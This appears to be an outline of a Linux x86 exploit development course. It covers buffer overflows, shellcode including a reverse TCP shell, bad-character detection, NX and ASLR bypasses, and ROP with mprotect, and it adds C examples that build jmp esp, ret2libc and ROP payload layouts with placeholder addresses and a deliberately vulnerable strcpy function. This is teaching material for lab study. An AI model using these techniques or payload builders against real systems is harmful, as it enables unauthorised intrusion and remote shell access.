
Explore exploit development for Linux (x86) by learning x86 assembly, mastering buffer overflows, writing shellcode, and bypassing NX and ASLR, culminating in a full exploit from scratch with ROP.
Download Ubuntu 16.04 LTS 32-bit and install it in VirtualBox to create an exploit development machine; allocate 3 GB RAM and 20 GB disk, then install Guest Additions for full-screen support.
Install and verify essential exploit development tools on the Ubuntu lab VM, including Python, Netcat, gdb, nasm, hexdump, objcopy, objdump, gef (a gdb wrapper), Vim, and SSH access from Kali.
Explore the fundamentals of x86 assembly, focusing on common instructions and debugging with gdb, while learning about eax, ebx, ecx, edx and their sub-registers, plus esp, ebp, and eip.
Learn to use sub-registers to move small values into 8-bit registers such as AL and CL in x86 assembly, and verify the results with gdb breakpoints.
Explore the add, sub, inc, and dec instructions in a nasm program called math.nasm, manipulating a register loaded with 230 through a series of arithmetic steps while stepping through in gdb.
Explore how bitwise exclusive OR works by XORing a register with itself to yield zero: load 0x14 into a register and observe zero after the XOR.
Explain the push and pop instructions in x86 assembly with nasm, showing how values are pushed onto the stack and popped into the eax and ebx registers.
Explore how cmp and jne drive control flow in x86 assembly; the lecture uses gdb to trace a simple C program's if/else and a printf call.
Demonstrate how call and ret manage function calls by tracing a C program in gdb, showing the right-to-left pushing of arguments and how the return address on the stack lets execution resume in main.
Explore basic stack-based buffer overflow exploitation by analyzing a vulnerable C program that uses strcpy, and learn to disable, and later bypass, mitigations such as stack canaries, ASLR, and NX.
Exploit a stack-based buffer overflow: compile a simple C program with NX, ASLR, and stack canary protections disabled, then run the 32-bit binary and overwrite the return address.
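The following is an added example, not the course's own program: the strcpy() pattern these lectures target, placed beside a bounded replacement so the difference is visible in code. It assumes gcc on the 32-bit Ubuntu VM and an assumed buffer size BUF_SIZE; to reproduce the EIP overwrite, build the unsafe path the way the course does, with mitigations off (`gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c`, ASLR disabled via `kernel.randomize_va_space=0`):

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* assumed buffer size for the demo */

/* Vulnerable form: strcpy() stops at the NUL byte, not at BUF_SIZE. On
 * 32-bit x86, buf sits below the saved ebp and the saved return address,
 * so a longer src runs over both; the 4 bytes that land on the return
 * address become EIP when this function returns. */
void vulnerable_copy(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);                 /* no bounds check */
    printf("copied %zu bytes\n", strlen(buf));
}

/* Hardened form: refuse input that does not fit (including the NUL), then
 * copy with an explicit length. Returns 0 on success, -1 when rejected. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);          /* bytes plus terminator */
    return 0;
}

/* Same buffer size as vulnerable_copy(), but bounded. */
int safe_copy_to_buf(const char *src)
{
    char buf[BUF_SIZE];
    return safe_copy(buf, sizeof buf, src);
}

/* Build n 'A' bytes, the shape of the course's Python crash payload, and
 * feed them to the hardened copy. Returns safe_copy()'s verdict. */
int try_copy_of_length(size_t n)
{
    char src[1024];
    if (n >= sizeof src)
        return -2;
    memset(src, 'A', n);
    src[n] = '\0';
    return safe_copy_to_buf(src);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    /* With the unsafe build, ./vuln "$(python -c 'print("A"*300)')" ends
     * with EIP = 0x41414141 in the core dump; the bounded path refuses. */
    if (safe_copy_to_buf(argv[1]) != 0)
        fprintf(stderr, "rejected: input longer than %d bytes\n", BUF_SIZE - 1);
    vulnerable_copy(argv[1]);
    return 0;
}
```

The bounded copy rejects anything of BUF_SIZE or more characters because the terminator also needs a slot; that off-by-one is the usual place a "fixed" copy still breaks.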
Craft a 300-character Python payload to crash the vulnerable Linux x86 program, enable core dumps, and analyze the core in gdb to observe EIP overwritten with 41 41 41 41.
Find the offset to EIP using msf-pattern_create and msf-pattern_offset in Kali Linux, confirming that the return address is overwritten after 268 characters.
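As an added example (not the course's code or Metasploit's), the C below reimplements what those two tools do, so the offset step can be understood rather than just run: generate the non-repeating "Aa0Aa1..." pattern, and map the little-endian word gdb prints in EIP back to its position in the pattern. The 300-byte length and the 268 offset are the course's numbers; eip_value_at() is a constructed stand-in for the crash.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX 20280   /* 26*26*10 triples * 3 bytes: every 4-byte window is unique */

/* Fill out[0..len) with the "Aa0Aa1Aa2..." sequence msf-pattern_create emits:
 * an upper-case letter, a lower-case letter and a digit, cycled like an
 * odometer. Returns the number of bytes written (at most PATTERN_MAX). */
size_t pattern_create(char *out, size_t len)
{
    static const char upper[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    static const char lower[] = "abcdefghijklmnopqrstuvwxyz";
    static const char digit[] = "0123456789";
    size_t pos = 0;
    if (len > PATTERN_MAX)
        len = PATTERN_MAX;
    for (size_t u = 0; u < 26 && pos < len; u++)
        for (size_t l = 0; l < 26 && pos < len; l++)
            for (size_t d = 0; d < 10 && pos < len; d++) {
                const char triple[3] = { upper[u], lower[l], digit[d] };
                for (size_t k = 0; k < 3 && pos < len; k++)
                    out[pos++] = triple[k];
            }
    return pos;
}

/* Given the EIP value gdb prints after the crash (e.g. 0x6a413969), return
 * the offset of those four bytes in a pattern of length len, or -1.
 * x86 is little-endian, so the low byte of EIP is the first byte in memory. */
long pattern_offset(uint32_t eip, size_t len)
{
    char buf[PATTERN_MAX];
    size_t n = pattern_create(buf, len);
    const unsigned char needle[4] = {
        eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(buf + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Constructed stand-in for the crash: the little-endian word that would land
 * in EIP if the pattern bytes at `offset` overwrote the return address. */
uint32_t eip_value_at(size_t offset, size_t len)
{
    char buf[PATTERN_MAX];
    size_t n = pattern_create(buf, len);
    if (offset + 4 > n)
        return 0;
    const unsigned char *p = (const unsigned char *)buf + offset;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

int main(void)
{
    char buf[301];
    size_t n = pattern_create(buf, 300);
    buf[n] = '\0';
    printf("pattern: %s\n", buf);
    uint32_t eip = eip_value_at(268, 300);
    printf("EIP 0x%08x -> offset %ld\n", eip, pattern_offset(eip, 300));
    return 0;
}
```

Note the byte reversal: gdb shows EIP as 0x6a413969, but the bytes in memory are "i9Aj", which is why feeding the hex word straight to a text search fails.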
Demonstrate placing shellcode in controllable stack space and forcing execution by redirecting the instruction pointer to it. Use a NOP sled to cushion the jump to the shellcode and verify in gdb.
Demonstrate the jump-to-register technique in gdb, redirecting execution to a NOP sled and shellcode by overwriting EIP with the address of a jmp-to-register instruction found in libc.
Explore locating the libc base address, finding a jump gadget with ropper, and redirecting execution to a NOP sled and shellcode in a Linux x86 exploit demo, with ASLR disabled.
Explore the jmp esp technique for stack-based buffer overflows: place the shellcode after the overwritten return address and use a jmp esp gadget to execute it, with stack analysis and exploit setup.
Learn stack-based buffer overflow exploitation on Linux x86 using jmp esp: place shellcode on the stack, locate a jmp esp address in libc with ropper, and spawn a shell.
Generate Linux x86 shellcode with msfvenom for the jmp esp exploit. Identify bad characters, starting with the null byte (0x00), and prepare to exclude them with a Python script.
Identify bad characters in the vulnerable Linux x86 program by generating all byte values with Python, inspecting what lands in memory with gdb, and refining the bad-character list so msfvenom can produce clean shellcode.
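The bad-character loop in C, as an added example rather than the course's Python script: build the 0x01..0xff probe minus the bytes already known to be bad, compare what was sent with what landed, and repeat until a probe survives intact. simulate_target() is a constructed stand-in for the vulnerable program's input path (it ends on 0x0a, strips 0x0d, and like strcpy() ends on 0x00); against a real target the "landed" bytes come from a gdb memory dump.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Probe: every byte value 0x01..0xff except those already known bad
 * (0x00 is assumed bad from the start, since strcpy() stops on it).
 * Returns the number of bytes written to out (at most 255). */
size_t build_badchar_probe(unsigned char *out, const unsigned char *known_bad, size_t nbad)
{
    size_t n = 0;
    for (unsigned v = 1; v < 256; v++) {
        if (nbad && memchr(known_bad, (int)v, nbad))
            continue;
        out[n++] = (unsigned char)v;
    }
    return n;
}

/* Compare what was sent with what gdb shows in the buffer (x/256xb &buf).
 * Returns the first sent byte that was altered or cut off, or 0 if all
 * survived. Only the first mismatch is trustworthy: after a bad byte the
 * rest is usually truncated or shifted, so add it to the list and re-probe. */
int first_bad_char(const unsigned char *sent, size_t sent_len,
                   const unsigned char *landed, size_t landed_len)
{
    for (size_t i = 0; i < sent_len; i++)
        if (i >= landed_len || landed[i] != sent[i])
            return sent[i];
    return 0;
}

/* Constructed stand-in for the target's input path (not the course's program):
 * a line-oriented reader ends the copy on 0x0a, strips 0x0d, and strcpy()
 * ends it on 0x00. */
size_t simulate_target(const unsigned char *in, size_t len, unsigned char *out)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (in[i] == 0x00 || in[i] == 0x0a)
            break;                     /* terminators */
        if (in[i] == 0x0d)
            continue;                  /* silently dropped */
        out[n++] = in[i];
    }
    return n;
}

/* Refinement loop: probe, record the first bad byte, exclude it, repeat until
 * a probe survives intact. bad[] receives the list; returns its length. */
size_t find_bad_chars(unsigned char *bad, size_t max_bad)
{
    unsigned char probe[255], landed[255];
    size_t nbad = 0;
    for (;;) {
        size_t plen = build_badchar_probe(probe, bad, nbad);
        size_t llen = simulate_target(probe, plen, landed);
        int b = first_bad_char(probe, plen, landed, llen);
        if (b == 0 || nbad >= max_bad)
            return nbad;
        bad[nbad++] = (unsigned char)b;
    }
}

/* i-th bad byte the loop finds against simulate_target(), or -1 past the end. */
int demo_bad_char(size_t i)
{
    unsigned char bad[16];
    size_t n = find_bad_chars(bad, sizeof bad);
    return i < n ? bad[i] : -1;
}

int main(void)
{
    unsigned char bad[16];
    size_t n = find_bad_chars(bad, sizeof bad);
    /* The list feeds msfvenom's -b option, e.g. -b '\x00\x0a\x0d' */
    printf("msfvenom ... -b '\\x00");
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", bad[i]);
    printf("'\n");
    return 0;
}
```

Against the simulated target the loop needs three probes: the first stops at 0x0a, the second shows 0x0d missing (the byte after it has shifted into its slot), and the third survives, which is the signal to stop.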
Use msfvenom to generate shellcode with the bad characters excluded, assemble the payload with a NOP sled to exploit the vulnerable Linux x86 binary, start a listener, and obtain a remote shell.
Write custom shellcode by converting C to assembly, tracing syscalls with strace, avoiding null bytes, and extracting the usable opcodes from the ELF, for both exit and reverse TCP shells.
Demonstrate writing exit shellcode for Linux x86 while avoiding null bytes through xor and register manipulation. Show assembling, linking, and opcode extraction for use in exploits.
Demonstrate crafting execve-based shellcode on Linux x86 by building a simple C program and a NASM routine, then compiling, tracing, and running it to spawn a /bin/sh shell.
Develop reverse TCP shellcode in nasm: create a new file, set the entry point, clear the registers, and implement the socket creation syscall (invoked via int 0x80) ahead of the connect step.
Write reverse TCP shellcode in nasm for Linux x86, covering socket creation, connect, and dup2, with register cleanup, a sockaddr payload in network byte order, and preparation for shell execution.
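Before the connect step the shellcode has to push the sockaddr_in structure as immediates, and those immediates are where null bytes creep in. The C below is an added example (not the course's nasm) that computes the values exactly as x86 stores them and applies the lecture's null-byte workaround: it assumes a constructed listener of 127.0.0.1:4444 and a complement-and-`not` encoding (push ~v ; not dword [esp]) for immediates that contain 0x00.

```c
#include <stdint.h>
#include <stdio.h>

/* a.b.c.d -> the 32-bit immediate whose in-memory bytes are a, b, c, d
 * (so 127.0.0.1 -> 0x0100007f). Returns 0 on a malformed string. */
uint32_t ipv4_word(const char *dotted)
{
    unsigned a, b, c, d;
    if (sscanf(dotted, "%u.%u.%u.%u", &a, &b, &c, &d) != 4 || (a | b | c | d) > 255)
        return 0;
    return a | (b << 8) | (c << 16) | (d << 24);
}

/* Port in network byte order as a 16-bit immediate: 4444 (0x115c) -> 0x5c11,
 * i.e. the bytes 0x11 0x5c in memory, what htons() would produce. */
uint16_t port_word(uint16_t host_port)
{
    return (uint16_t)(((host_port & 0xff) << 8) | (host_port >> 8));
}

/* 1 if any of the low `nbytes` bytes of v is 0x00: such an immediate cannot
 * go into null-free shellcode, because push imm encodes it verbatim. */
int has_null_byte(uint32_t v, int nbytes)
{
    for (int i = 0; i < nbytes; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Workaround for an immediate with null bytes: push its complement and undo
 * it on the stack (push ~v ; not dword [esp]). Returns ~v. */
uint32_t nullfree_encode(uint32_t v)
{
    return ~v;
}

/* The 16-byte struct sockaddr_in that connect() reads: sin_family (2),
 * sin_port (network order), sin_addr, then 8 bytes of sin_zero. The shellcode
 * builds it last field first: push addr ; push word port ; push word 2 ;
 * mov ecx, esp. Returns byte i of the structure, or -1 on bad input. */
int sockaddr_byte(const char *ip, uint16_t port, size_t i)
{
    unsigned char s[16] = {0};
    uint32_t addr = ipv4_word(ip);
    uint16_t p = port_word(port);
    if (addr == 0 || i > 15)
        return -1;
    s[0] = 2;                          /* AF_INET, low byte first */
    s[2] = p & 0xff;
    s[3] = p >> 8;
    for (int k = 0; k < 4; k++)
        s[4 + k] = (addr >> (8 * k)) & 0xff;
    return s[i];
}

int main(void)
{
    const char *ip = "127.0.0.1";      /* constructed listener address */
    uint32_t addr = ipv4_word(ip);
    uint16_t port = port_word(4444);
    printf("push 0x%08x    ; %s%s\n", addr, ip,
           has_null_byte(addr, 4) ? "  <- contains 0x00" : "");
    if (has_null_byte(addr, 4))
        printf("push 0x%08x    ; ~addr, followed by: not dword [esp]\n", nullfree_encode(addr));
    printf("push word 0x%04x ; port 4444%s\n", port,
           has_null_byte(port, 2) ? "  <- contains 0x00" : "");
    printf("push word 2      ; AF_INET\n");
    return 0;
}
```

127.0.0.1 is the usual lab trap: its word 0x0100007f carries two null bytes, while the complement 0xfeffff80 has none. Ports below 256 have the same problem in their high byte, so the check takes the operand width.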
This lecture walks through building reverse TCP shellcode in nasm, including socket creation, the connect details, fd redirection with dup2, and invoking execve to spawn a shell.
Optimize the reverse TCP shellcode by replacing the repetitive dup2 calls with a loop, then assemble, test, extract the shellcode, and integrate it into the exploit.
Explore exploit mitigations such as NX (non-executable stack) and address space layout randomization (ASLR), examine how these defenses affect exploits, and survey approaches to bypassing them.
Explore how the NX bit makes the stack non-executable, observe its impact on the vulnerable C program, and preview return-to-libc and return-oriented programming as ways to bypass NX.
Explore bypassing NX with a return-to-libc attack that calls libc's system() with "/bin/sh", using the addresses of system and exit to spawn a shell from the vulnerable binary.
Demonstrate bypassing ASLR on Linux x86 by brute-forcing the libc base address, using known offsets in a return-to-libc exploit, to obtain a shell.
Learn return-oriented programming (ROP) to bypass non-executable stacks on Linux x86 by chaining gadgets that make the stack executable and then run shellcode. Explore using mprotect and careful gadget selection for reliable chains.
Demonstrate how mprotect changes a stack page's protections: it takes three arguments, a page-aligned base address, a length, and the protection flags, where 7 (PROT_READ | PROT_WRITE | PROT_EXEC) grants read, write, and execute access.
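As an added example (not from the course), the C program below makes the NX lecture and the mprotect lecture concrete in one run: it maps a page, writes a constructed six-byte stub into it, and calls it twice, once while the page is still read/write, which NX turns into a SIGSEGV that the program catches, and once after mprotect() with protection 7. It assumes an x86 or x86-64 Linux host with NX enabled; the stub's encoding is the same on both.

```c
#define _DEFAULT_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#if !defined(__i386__) && !defined(__x86_64__)
#error "this demo's stub is x86 machine code"
#endif

/* Constructed stub, same encoding on x86 and x86-64:
 *   b8 2a 00 00 00   mov eax, 42
 *   c3               ret                                               */
static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

static sigjmp_buf segv_jmp;
static void on_segv(int sig) { (void)sig; siglongjmp(segv_jmp, 1); }

/* Copy the stub into a fresh page, set the given protection with mprotect
 * (the same call the ROP chain makes), and call the page. Returns 42 when
 * the CPU executed it, -1 when NX raised SIGSEGV, -2 on a mapping failure. */
static int run_stub_with(int prot)
{
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    void *page = mmap(NULL, pagesz, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -2;
    memcpy(page, stub, sizeof stub);
    if (mprotect(page, pagesz, prot) != 0) {   /* mprotect(addr, len, prot) */
        munmap(page, pagesz);
        return -2;
    }

    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_NODEFER;
    sigaction(SIGSEGV, &sa, &old);

    volatile int result = -1;
    if (sigsetjmp(segv_jmp, 1) == 0) {
        int (*fn)(void) = (int (*)(void))(uintptr_t)page;
        result = fn();                         /* faults here under NX if !PROT_EXEC */
    }
    sigaction(SIGSEGV, &old, NULL);
    munmap(page, pagesz);
    return result;
}

/* NX in effect: readable and writable, not executable. */
int run_from_rw_page(void) { return run_stub_with(PROT_READ | PROT_WRITE); }

/* After mprotect(..., 7): read, write and execute, so the jump succeeds. */
int run_from_rwx_page(void) { return run_stub_with(PROT_READ | PROT_WRITE | PROT_EXEC); }

/* The first argument must be page aligned, which is why the chain masks the
 * stack address (e.g. 0xbffff5d4 -> 0xbffff000) before the call. */
uint32_t page_align_down(uint32_t addr, uint32_t pagesz) { return addr & ~(pagesz - 1); }

/* The third argument: 7 == PROT_READ | PROT_WRITE | PROT_EXEC. */
int prot_rwx(void) { return PROT_READ | PROT_WRITE | PROT_EXEC; }

int main(void)
{
    printf("RW page: %d (expect -1 under NX)\n", run_from_rw_page());
    printf("RWX page after mprotect(..., 7): %d\n", run_from_rwx_page());
    return 0;
}
```

The same sequence, minus the signal handling, is what the ROP chain has to arrange for the stack: an aligned address, a length that covers the shellcode, and 7 as the third argument, after which a plain jump into the stack no longer faults.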
Learn to build a return-oriented programming chain on Linux x86 by locating gadgets such as pop edx; ret, assembling the ROP chain, and handling the libc base address with ASLR disabled.
Learn to locate the address of mprotect and craft a ROP chain that preserves register state and makes the stack executable so the shellcode can run.
Learn how to assemble the final exploit from the ROP chain, a jmp esp gadget, and shellcode to trigger a reverse TCP shell on Linux x86.
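The three stack layouts the course builds (jmp esp, return-to-libc, and the mprotect ROP chain) differ only in what follows the 268 bytes of filler. The C below is an added example, not the course's exploit script, that builds each one byte for byte so the frames can be compared. All addresses are hypothetical placeholders for the values gdb and ropper would give with ASLR off; the pop;pop;pop;ret gadget and the order of the ROP chain are one common arrangement assumed here, not necessarily the lecture's; the shellcode is a constructed five-byte exit() stub.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical addresses (ASLR off). Real ones come from gdb (p system,
 * p exit, p mprotect, find &system,+9999999,"/bin/sh") and from ropper. */
#define DEMO_OFFSET     268          /* from msf-pattern_offset */
#define DEMO_SYSTEM     0xb7e41da0u
#define DEMO_EXIT       0xb7e359d0u
#define DEMO_BINSH      0xb7f62a0bu
#define DEMO_MPROTECT   0xb7ec4310u
#define DEMO_JMP_ESP    0xb7f8a5cdu  /* jmp esp gadget in libc */
#define DEMO_POP3_RET   0x080484e9u  /* pop;pop;pop;ret in the binary */
#define DEMO_STACK_PAGE 0xbffff000u  /* stack address rounded to a page */

/* Constructed placeholder shellcode: exit() = xor eax,eax ; inc eax ; int 0x80 */
static const unsigned char demo_sc[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 };

/* Append v as x86 stores it (little-endian); returns the new position. */
static size_t put32(unsigned char *buf, size_t pos, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        buf[pos++] = (v >> (8 * i)) & 0xff;
    return pos;
}

static uint32_t read32(const unsigned char *b, size_t p)
{
    return (uint32_t)b[p] | ((uint32_t)b[p + 1] << 8) | ((uint32_t)b[p + 2] << 16) | ((uint32_t)b[p + 3] << 24);
}

/* jmp esp (NX off): filler | &jmp esp | NOP sled | shellcode. After the
 * vulnerable function's ret, esp points just past the return address, so
 * jmp esp lands on the sled. */
size_t build_jmp_esp(unsigned char *out, size_t offset, uint32_t jmp_esp,
                     size_t sled, const unsigned char *sc, size_t sc_len)
{
    memset(out, 'A', offset);
    size_t pos = put32(out, offset, jmp_esp);
    memset(out + pos, 0x90, sled);
    memcpy(out + pos + sled, sc, sc_len);
    return pos + sled + sc_len;
}

/* ret2libc (NX on): filler | &system | &exit | &"/bin/sh". ret pops &system
 * into EIP; system() then sees &exit as its return address and &"/bin/sh"
 * as its first argument, so the shell exits without a second crash. */
size_t build_ret2libc(unsigned char *out, size_t offset, uint32_t system_addr,
                      uint32_t exit_addr, uint32_t binsh_addr)
{
    memset(out, 'A', offset);
    size_t pos = put32(out, offset, system_addr);
    pos = put32(out, pos, exit_addr);
    return put32(out, pos, binsh_addr);
}

/* ROP + mprotect (NX on), one common arrangement assumed here:
 * filler | &mprotect | &pop3ret | page | len | 7 | &jmp esp | shellcode.
 * mprotect(page, len, 7) returns into pop;pop;pop;ret, which skips its three
 * arguments and returns into jmp esp; esp then points at the shellcode,
 * which lies in the page just made executable. */
size_t build_mprotect_chain(unsigned char *out, size_t offset, uint32_t mprotect_addr,
                            uint32_t pop3_ret, uint32_t page, uint32_t len,
                            uint32_t jmp_esp, const unsigned char *sc, size_t sc_len)
{
    memset(out, 'A', offset);
    size_t pos = put32(out, offset, mprotect_addr);
    pos = put32(out, pos, pop3_ret);
    pos = put32(out, pos, page);
    pos = put32(out, pos, len);
    pos = put32(out, pos, 7);                 /* PROT_READ|PROT_WRITE|PROT_EXEC */
    pos = put32(out, pos, jmp_esp);
    memcpy(out + pos, sc, sc_len);
    return pos + sc_len;
}

/* Caveat check: 0x00 bytes after the filler survive a read()/fgets() input
 * path but not strcpy()/argv, where such values must come from gadgets. */
size_t count_nulls(const unsigned char *buf, size_t from, size_t to)
{
    size_t n = 0;
    for (size_t i = from; i < to; i++)
        n += buf[i] == 0;
    return n;
}

/* Demo accessors using the hypothetical values above. */
static size_t demo_chain(unsigned char *buf)
{
    return build_mprotect_chain(buf, DEMO_OFFSET, DEMO_MPROTECT, DEMO_POP3_RET,
                                DEMO_STACK_PAGE, 0x1000, DEMO_JMP_ESP, demo_sc, sizeof demo_sc);
}
int demo_jmp_esp_byte(size_t i)
{
    unsigned char buf[512];
    size_t n = build_jmp_esp(buf, DEMO_OFFSET, DEMO_JMP_ESP, 16, demo_sc, sizeof demo_sc);
    return i < n ? buf[i] : -1;
}
uint32_t demo_ret2libc_word(size_t i)      /* i-th dword after the filler, 0 past the end */
{
    unsigned char buf[512];
    size_t n = build_ret2libc(buf, DEMO_OFFSET, DEMO_SYSTEM, DEMO_EXIT, DEMO_BINSH);
    return DEMO_OFFSET + 4 * i + 4 <= n ? read32(buf, DEMO_OFFSET + 4 * i) : 0;
}
uint32_t demo_mprotect_word(size_t i)
{
    unsigned char buf[512];
    size_t n = demo_chain(buf);
    return DEMO_OFFSET + 4 * i + 4 <= n ? read32(buf, DEMO_OFFSET + 4 * i) : 0;
}
size_t demo_mprotect_nulls(void)
{
    unsigned char buf[512];
    return count_nulls(buf, DEMO_OFFSET, demo_chain(buf));
}
```

The null count is the practical difference between the ret2libc frame and the mprotect chain: the libc addresses are null-free, but the page address, the length and the literal 7 are not, so the chain as laid out only works where the input path passes 0x00 through; otherwise those three words have to be produced with gadgets such as the pop edx; ret the course locates.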
Provide feedback on the Linux (x86) exploit development course to help improve future sessions, and encourage others to share the course with friends, colleagues, and on social media.
Demonstrate learning-driven exploitation of a simple C program, highlighting printf format string and gets() vulnerabilities, the effects of ASLR and NX, and the use of pwntools and gdb to explore exploitation concepts.
This course teaches exploit development for Linux (x86) and introduces students to the concepts behind exploiting Linux x86 binaries. It is an entry-level to intermediate course, and we encourage you to take it if you are interested in learning exploit development. Be aware that the course involves a great deal of assembly language and debugging in a debugger, so patience and persistence are needed to absorb the material. It covers a variety of exploit development techniques and expects you to follow along hands-on at a computer. After completing this course, you will be ready to attempt several industry-leading practical cyber security certification exams.